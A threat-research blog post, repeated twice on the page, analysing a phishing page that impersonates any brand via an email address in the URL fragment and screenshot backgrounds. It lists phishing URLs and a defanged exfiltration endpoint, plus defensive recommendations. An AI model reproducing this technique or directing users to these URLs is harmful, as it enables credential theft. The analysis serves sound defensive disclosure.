Phishing
4
mins read

Unmasking Cyber Deception: The Rise of Generic Phishing Pages Targeting Multiple Brands

CloudSEK's research uncovers a generic phishing framework capable of targeting multiple brands by leveraging customizable URLs to impersonate legitimate login pages. Hosted on Cloudflare's workers.dev, these phishing pages dynamically adapt by using targeted email domains to generate realistic backgrounds, deceiving users into surrendering credentials. The stolen data is exfiltrated to a remote server via obfuscated JavaScript. Organizations must enhance awareness through training, simulate phishing scenarios, and establish clear reporting protocols to mitigate risks and protect against evolving phishing threats.

Anshuman Das
January 24, 2025
Green Alert
Last Update posted on
January 24, 2025
Proactive Monitoring of the Dark Web for your organization.

Proactively monitor and defend your organization against threats from the dark web with CloudSEK XVigil.

Schedule a Demo
Table of Contents
Author(s)
No items found.

Executive Summary

The CloudSEK Threat Research Team discovered a generic phishing page that can impersonate any brand using a generic login page to steal credentials. The phishing page is hosted using Cloudflare's workers.dev, a free domain name service. 

  • The generic-looking phishing page is hosted on this URL: workers-playground-broken-king-d18b.supermissions.workers.dev, which is designed to steal credentials from unsuspecting victims. 
  • Phishing attacks can be customized to target specific organizations by adding an employee's email address to the end of a generic phishing page URL, separated by a # symbol.
  • The phishing site takes a screenshot of the domain found in the targeted user's email address (e.g. google.com) using thum.io (a free website screenshot generator) and uses it as the background of the phishing site to deceive unsuspecting users. 
  • Once the victim enters credentials to log in, their credentials are exfiltrated to a remote endpoint - hxxps://kagn[.]org/zebra/nmili-wabmall.php
  • The phishing page's DOM was obfuscated using JavaScript (filename: myscr939830.js) to evade detection from scam engines.

Analysis and Attribution

Technical Analysis of the Phishing Page

1. The generic looking phishing page is hosted on this URL: workers-playground-broken-king-d18b.supermissions.workers.dev  which is designed to steal credentials from unsuspecting victims.

Fig1. A Generic Looking Phishing Page to Steal Credentials

2. In order to turn the generic looking webmail login page into impersonating specific brand scam can use this crafted URL: workers-playground-broken-king-d18b.supermissions.workers.dev/#[email protected]

Fig2. In the screenshot the generic phishing webpage turned into a fake google login page

3. Phishing attacks can be customized to target specific organizations by adding an employee's email address to the end of a generic phishing page URL, separated by a # symbol.

4. The phishing site takes a screenshot of the domain found in the targeted user's email address (e.g. google.com) using thum.io(a free website screenshot generator) and uses it as the background of the phishing site to deceive unsuspecting users.

Fig3. While crafting with URL with an email with targeted brand name, phishing site  takes the screenshot of legitimate website and make it the background

5. Once victim enters credentials to login then their credentials are being exfiltrated to a remote endpoint - hxxps://kagn[.]org/zebra/nmili-wabmall.php

Fig4. Screenshot showing the exfiltration from the impersonated phishing page to a remote server controlled by the scammers

6. The phishing page's DOM was obfuscated using JavaScript (filename:myscr939830.js)[Fig5] to evade detection from scam engines. However, the JavaScript was not sophisticated and was easily deobfuscated. Once deobfuscated, the page's functionalities could be verified from the source code.

Fig5: Obfuscated page source of phishing page to evade detections

7. The code snippet prevents users from viewing the page source, which can be used to identify and block phishing attempts - Fig6

Fig6Phishing attacks can be obfuscated by blocking the ability to view the page source

8. Below is the functionality in the deobfuscated source code demonstrating how a phishing page is dynamically generated using free services from thum.io and Google’s favicon fetcher endpoint.

Fig7. Dynamically generated background by abusing free services like google and thum.io

Attribution

1. Based on the similarity of the obfuscated Javascript file, we have identified other phishing URLs employing the same tactics but hosted with Cloudflare's r2.dev: https://pub-3bb44684992b489e903bd3455d3b6513.r2[.]dev/WEBDATAJHNCHJF879476436743YREBHREBNFBJNFHJFEJERUI4894768467RYHGJGFHJGHJ.html

2. During a deeper analysis of the same JavaScript file (myscr939830.js), it was discovered that it is hosted on a free blockchain storage service, web3.storage.

3. The threat actor exfiltrated the stolen credentials to a remote server, kagn[].org. This domain, controlled by the threat actor, was registered 6 years ago and is hosted on Wordpress. The threat actor likely exploited a vulnerability and possibly backdoored the server at /zebra/nmili-wabmall.php.

Recommendations

  • Educate employees on how to identify and report phishing campaigns, focusing on the tactics used in generic phishing attacks.
  • Launch a D2C awareness campaign to educate customers on the risks of generic phishing attacks and the importance of remaining vigilant.
  • Implement a phishing simulation program to regularly test employees' ability to recognize and respond to phishing attempts.
  • Establish a clear process for reporting suspected phishing attacks, ensuring that employees know who to contact and how to provide relevant information.

References

Author

Anshuman Das

Threat Research @CloudSEK

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
No items found.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil
Phishing

4

min read

Unmasking Cyber Deception: The Rise of Generic Phishing Pages Targeting Multiple Brands

CloudSEK's research uncovers a generic phishing framework capable of targeting multiple brands by leveraging customizable URLs to impersonate legitimate login pages. Hosted on Cloudflare's workers.dev, these phishing pages dynamically adapt by using targeted email domains to generate realistic backgrounds, deceiving users into surrendering credentials. The stolen data is exfiltrated to a remote server via obfuscated JavaScript. Organizations must enhance awareness through training, simulate phishing scenarios, and establish clear reporting protocols to mitigate risks and protect against evolving phishing threats.

Authors
Anshuman Das
Threat Research @CloudSEK
Co-Authors
No items found.

Executive Summary

The CloudSEK Threat Research Team discovered a generic phishing page that can impersonate any brand using a generic login page to steal credentials. The phishing page is hosted using Cloudflare's workers.dev, a free domain name service. 

  • The generic-looking phishing page is hosted on this URL: workers-playground-broken-king-d18b.supermissions.workers.dev, which is designed to steal credentials from unsuspecting victims. 
  • Phishing attacks can be customized to target specific organizations by adding an employee's email address to the end of a generic phishing page URL, separated by a # symbol.
  • The phishing site takes a screenshot of the domain found in the targeted user's email address (e.g. google.com) using thum.io (a free website screenshot generator) and uses it as the background of the phishing site to deceive unsuspecting users. 
  • Once the victim enters credentials to log in, their credentials are exfiltrated to a remote endpoint - hxxps://kagn[.]org/zebra/nmili-wabmall.php
  • The phishing page's DOM was obfuscated using JavaScript (filename: myscr939830.js) to evade detection from scam engines.

Analysis and Attribution

Technical Analysis of the Phishing Page

1. The generic looking phishing page is hosted on this URL: workers-playground-broken-king-d18b.supermissions.workers.dev  which is designed to steal credentials from unsuspecting victims.

Fig1. A Generic Looking Phishing Page to Steal Credentials

2. In order to turn the generic looking webmail login page into impersonating specific brand scam can use this crafted URL: workers-playground-broken-king-d18b.supermissions.workers.dev/#[email protected]

Fig2. In the screenshot the generic phishing webpage turned into a fake google login page

3. Phishing attacks can be customized to target specific organizations by adding an employee's email address to the end of a generic phishing page URL, separated by a # symbol.

4. The phishing site takes a screenshot of the domain found in the targeted user's email address (e.g. google.com) using thum.io(a free website screenshot generator) and uses it as the background of the phishing site to deceive unsuspecting users.

Fig3. While crafting with URL with an email with targeted brand name, phishing site  takes the screenshot of legitimate website and make it the background

5. Once victim enters credentials to login then their credentials are being exfiltrated to a remote endpoint - hxxps://kagn[.]org/zebra/nmili-wabmall.php

Fig4. Screenshot showing the exfiltration from the impersonated phishing page to a remote server controlled by the scammers

6. The phishing page's DOM was obfuscated using JavaScript (filename:myscr939830.js)[Fig5] to evade detection from scam engines. However, the JavaScript was not sophisticated and was easily deobfuscated. Once deobfuscated, the page's functionalities could be verified from the source code.

Fig5: Obfuscated page source of phishing page to evade detections

7. The code snippet prevents users from viewing the page source, which can be used to identify and block phishing attempts - Fig6

Fig6Phishing attacks can be obfuscated by blocking the ability to view the page source

8. Below is the functionality in the deobfuscated source code demonstrating how a phishing page is dynamically generated using free services from thum.io and Google’s favicon fetcher endpoint.

Fig7. Dynamically generated background by abusing free services like google and thum.io

Attribution

1. Based on the similarity of the obfuscated Javascript file, we have identified other phishing URLs employing the same tactics but hosted with Cloudflare's r2.dev: https://pub-3bb44684992b489e903bd3455d3b6513.r2[.]dev/WEBDATAJHNCHJF879476436743YREBHREBNFBJNFHJFEJERUI4894768467RYHGJGFHJGHJ.html

2. During a deeper analysis of the same JavaScript file (myscr939830.js), it was discovered that it is hosted on a free blockchain storage service, web3.storage.

3. The threat actor exfiltrated the stolen credentials to a remote server, kagn[].org. This domain, controlled by the threat actor, was registered 6 years ago and is hosted on Wordpress. The threat actor likely exploited a vulnerability and possibly backdoored the server at /zebra/nmili-wabmall.php.

Recommendations

  • Educate employees on how to identify and report phishing campaigns, focusing on the tactics used in generic phishing attacks.
  • Launch a D2C awareness campaign to educate customers on the risks of generic phishing attacks and the importance of remaining vigilant.
  • Implement a phishing simulation program to regularly test employees' ability to recognize and respond to phishing attempts.
  • Establish a clear process for reporting suspected phishing attacks, ensuring that employees know who to contact and how to provide relevant information.

References